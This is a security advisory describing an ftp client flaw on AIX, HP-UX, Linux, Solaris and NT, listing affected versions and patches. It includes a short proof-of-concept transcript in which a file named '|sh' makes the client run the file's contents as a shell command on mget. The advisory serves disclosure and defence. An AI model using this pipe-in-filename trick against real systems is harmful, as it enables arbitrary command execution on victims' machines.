COMMAND
ftp
SYSTEMS AFFECTED
AIX 3.2, 4.1, 4.2
HPUX 9.05, 9.07, 10.10, 10.20 (Others?)
Linux Slackware (Others?)
Solaris 2.5.1, 2.6 (Others?)
NTAS 4.0
PROBLEM
The ftp client can be tricked into running arbitrary commands
supplied by the remote server. When the remote file begins with
a pipe symbol, the ftp client will process the contents of the
remote file as a shell script. Remote ftp servers can cause
arbitrary commands to run on the local machine. This can include
remote root access. This also happens with netkit-ftp-0.10.
Andrew Green posted following 'test':
$ id
uid=100(guest) gid=100(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x 2 guest usr 512 Nov 3 09:45 .
drwxrwxrwt 6 bin bin 1024 Nov 3 09:44 ..
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r-- 1 guest usr 28 Nov 3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)
$
List of vulnerable system is list on which this test has been
performed with success.
SOLUTION
Remove the setuid bit from the "ftp" command until installing
patches. This will make your fto unusable. Patches are:
AIX 3.2............ no fixes available for AIX 3.2 (upgrade to
a higher level)
AIX 4.1............ APAR - IX70885
AIX 4.2............ APAR - IX70886
AIX 4.3: fix already contained in the release